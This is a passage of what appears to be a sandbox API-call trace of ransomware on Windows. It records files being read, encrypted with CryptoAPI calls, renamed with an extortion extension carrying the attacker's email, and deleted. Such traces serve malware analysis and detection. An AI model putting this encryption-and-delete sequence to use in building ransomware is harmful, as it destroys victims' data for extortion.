[0069.407] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x16e0a8, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0069.408] WriteFile (in: hFile=0x268, lpBuffer=0x3bf015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf015a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0069.409] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x8f58d, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0069.409] WriteFile (in: hFile=0x268, lpBuffer=0x3bf015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf015a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0069.411] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0069.411] WriteFile (in: hFile=0x268, lpBuffer=0x3bf015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf015a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0069.413] CloseHandle (hObject=0x268) returned 1 [0070.024] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0070.024] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=2285736) returned 1 [0070.024] CloseHandle (hObject=0x268) returned 1 [0070.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")) returned 0x20 [0070.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0070.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")) returned 1 [0070.026] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0070.026] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=567512) returned 1 [0070.026] CloseHandle (hObject=0x268) returned 1 [0070.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll")) returned 0x20 [0070.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.026] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.027] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0070.027] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1231576) returned 1 [0070.028] CloseHandle (hObject=0x330) returned 1 [0070.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll")) returned 0x20 [0070.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.028] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.028] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.028] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0070.028] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=947928) returned 1 [0070.028] CloseHandle (hObject=0x330) returned 1 [0070.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll")) returned 0x20 [0070.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.028] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.029] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0070.029] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1295576) returned 1 [0070.029] CloseHandle (hObject=0x330) returned 1 [0070.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll")) returned 0x20 [0070.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.029] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0070.030] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=512216) returned 1 [0070.030] CloseHandle (hObject=0x330) returned 1 [0070.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 0x20 [0070.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0070.030] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0070.030] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0070.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0070.031] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c40) returned 1 [0070.031] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0070.031] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x7d0d8, lpOverlapped=0x0) returned 1 [0070.035] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x7d0e0, dwBufLen=0x7d0e0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x7d0e0) returned 1 [0070.036] WriteFile (in: hFile=0x300, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x7d0e0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x7d0e0, lpOverlapped=0x0) returned 1 [0070.043] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b00) returned 1 [0070.043] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0070.044] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0070.044] CryptDestroyKey (hKey=0xf71b00) returned 1 [0070.044] WriteFile (in: hFile=0x300, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0070.044] CryptDestroyKey (hKey=0xf71c40) returned 1 [0070.044] CloseHandle (hObject=0x330) returned 1 [0070.044] CloseHandle (hObject=0x300) returned 1 [0070.053] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 1 [0070.057] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0070.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0070.058] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=263896) returned 1 [0070.058] CloseHandle (hObject=0x300) returned 1 [0070.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe")) returned 0x20 [0070.058] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 Thread: id = 34 os_tid = 0xa98 [0045.265] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3c50048 [0045.394] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x3c60050 [0045.413] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x3c70058 [0045.413] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x110102) returned 0x3e5c020 [0045.415] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x3c70088 [0045.415] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa70, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efad8 | out: phKey=0x38efad8*=0xf59168) returned 1 [0045.415] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x38efac0, dwFlags=0x0) returned 1 [0045.415] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3c70088, pdwDataLen=0x38efa8c | out: pbData=0x3c70088, pdwDataLen=0x38efa8c) returned 1 [0045.415] CryptDestroyKey (hKey=0xf59168) returned 1 [0045.415] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.416] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.416] Wow64DisableWow64FsRedirection (in: OldValue=0x38efb28 | out: OldValue=0x38efb28*=0x0) returned 1 [0045.416] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3c70088 | out: hHeap=0x2a60000) returned 1 [0045.416] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.416] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0045.418] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=144072) returned 1 [0045.418] CloseHandle (hObject=0x30c) returned 1 [0045.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 0x20 [0045.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.418] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0045.418] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.418] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.418] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.419] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf58ee8) returned 1 [0045.419] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.420] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x232c8, lpOverlapped=0x0) returned 1 [0045.434] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x232d0, dwBufLen=0x232d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x232d0) returned 1 [0045.434] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x232d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x232d0, lpOverlapped=0x0) returned 1 [0045.437] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf590a8) returned 1 [0045.437] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.437] CryptEncrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.437] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.437] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0045.438] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.438] CloseHandle (hObject=0x30c) returned 1 [0045.438] CloseHandle (hObject=0x310) returned 1 [0045.441] DeleteFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 1 [0045.443] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.443] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.704] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=156) returned 1 [0045.704] CloseHandle (hObject=0x2e4) returned 1 [0045.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 0x20 [0045.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.704] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.704] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.704] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.705] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0045.705] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf58e68) returned 1 [0045.705] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.705] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x9c, lpOverlapped=0x0) returned 1 [0045.706] CryptEncrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0, dwBufLen=0xa0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xa0) returned 1 [0045.706] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xa0, lpOverlapped=0x0) returned 1 [0045.707] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf58ee8) returned 1 [0045.707] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.707] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.707] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.707] WriteFile (in: hFile=0x310, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0045.707] CryptDestroyKey (hKey=0xf58e68) returned 1 [0045.707] CloseHandle (hObject=0x2e4) returned 1 [0045.707] CloseHandle (hObject=0x310) returned 1 